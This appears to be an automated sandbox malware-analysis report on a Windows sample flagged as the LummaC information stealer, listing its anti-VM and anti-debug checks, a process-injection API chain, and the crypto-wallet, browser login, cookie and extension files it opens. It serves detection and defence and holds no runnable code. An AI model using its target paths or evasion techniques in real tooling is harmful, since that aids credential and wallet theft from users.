Source:	Binary string: System.pdb source: WERB259.tmp.dmp.4.dr

Source: Superority.exe1.exe

Static PE information: 0xADFF511F [Mon Jul 3 22:20:15 2062 UTC]

Source: Superority.exe1.exe

Static PE information: section name: .CSS

Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0045722D push eax; ret	1_2_00457236
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00457237 push ecx; ret	1_2_00457252
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00457284 push ebx; ret	1_2_00457286
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00457290 push ebx; ret	1_2_00457292
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0045735C push ebp; ret	1_2_0045743A
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0045735C push ebp; ret	1_2_0045744E
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00457450 push ebp; ret	1_2_00457452
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0045745C push ebp; ret	1_2_0045745E
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00457459 push ebp; ret	1_2_0045745A
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00457463 push ebp; ret	1_2_00457466
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00457469 push esp; ret	1_2_0045746A
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00457470 push esp; ret	1_2_00457482
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0045742C push ebp; ret	1_2_0045743A
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0045743F push ebp; ret	1_2_0045744E
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00456D60 push eax; ret	1_2_00456D62
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00456D63 push ecx; ret	1_2_00456D6A
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00456D6C push ecx; ret	1_2_00456D6E
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00456D7C push ebx; ret	1_2_00456D82
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00456DF8 push ss; ret	1_2_00456DF9
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00456DAF push edx; ret	1_2_00456DB2
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00454DA9 push edi; iretd	1_2_00454DDF
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00456E45 push esp; ret	1_2_00456E46
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00456E4C push esi; ret	1_2_00456E52
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00456E54 push ebp; ret	1_2_00456E5E
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00456E90 push ecx; ret	1_2_00456E96

Source: C:\Users\user\Desktop\Superority.exe1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Superority.exe1.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Superority.exe1.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Superority.exe1.exe	Memory allocated: 1110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Memory allocated: 2BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Memory allocated: 1130000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Memory allocated: 5B40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Memory allocated: 4FE0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Superority.exe1.exe

Window / User API: threadDelayed 3487

Jump to behavior

Source: C:\Users\user\Desktop\Superority.exe1.exe TID: 4160	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe TID: 7552	Thread sleep count: 3487 > 30			Jump to behavior

Source: C:\Users\user\Desktop\Superority.exe1.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\Superority.exe1.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\Superority.exe1.exe	Last function: Thread delayed

Source: Amcache.hve.4.dr	Binary or memory string: VMware
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1hbin@
Source: Superority.exe1.exe, 00000001.00000002.2376204564.000000000140C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: Amcache.hve.4.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Superority.exe1.exe, 00000001.00000002.2376204564.000000000143D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.4.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.4.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.4.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\Superority.exe1.exe

API call chain: ExitProcess graph end node

graph_1-23723

Source: C:\Users\user\Desktop\Superority.exe1.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Superority.exe1.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Superority.exe1.exe

Code function: 1_2_0044C8F0 LdrInitializeThunk,

1_2_0044C8F0

Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 0_2_02BA21FD mov edi, dword ptr fs:[00000030h]		0_2_02BA21FD
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 0_2_02BA237A mov edi, dword ptr fs:[00000030h]		0_2_02BA237A

Source: C:\Users\user\Desktop\Superority.exe1.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\Superority.exe1.exe

Code function: 0_2_02BA21FD GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_02BA21FD

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Superority.exe1.exe

Memory written: C:\Users\user\Desktop\Superority.exe1.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Superority.exe1.exe

Process created: C:\Users\user\Desktop\Superority.exe1.exe "C:\Users\user\Desktop\Superority.exe1.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Superority.exe1.exe	Queries volume information: C:\Users\user\Desktop\Superority.exe1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Superority.exe1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.4.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.LOG1.4.dr, Amcache.hve.4.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.LOG1.4.dr, Amcache.hve.4.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.LOG1.4.dr, Amcache.hve.4.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\Superority.exe1.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 1.2.Superority.exe1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Superority.exe1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2375512214.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1229681983.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Superority.exe1.exe, 00000001.00000002.2376638644.0000000001493000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: :"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":
Source: Superority.exe1.exe, 00000001.00000002.2376638644.0000000001493000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ,"d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"
Source: Superority.exe1.exe, 00000001.00000002.2376638644.0000000001493000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"
Source: Superority.exe1.exe, 00000001.00000002.2376204564.000000000143D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Superority.exe1.exe, 00000001.00000002.2376638644.0000000001493000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 0971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallet
Source: Superority.exe1.exe, 00000001.00000002.2376638644.0000000001493000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 0971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallet
Source: Superority.exe1.exe, 00000001.00000002.2376638644.0000000001493000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":
Source: Superority.exe1.exe, 00000001.00000002.2376638644.0000000001493000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
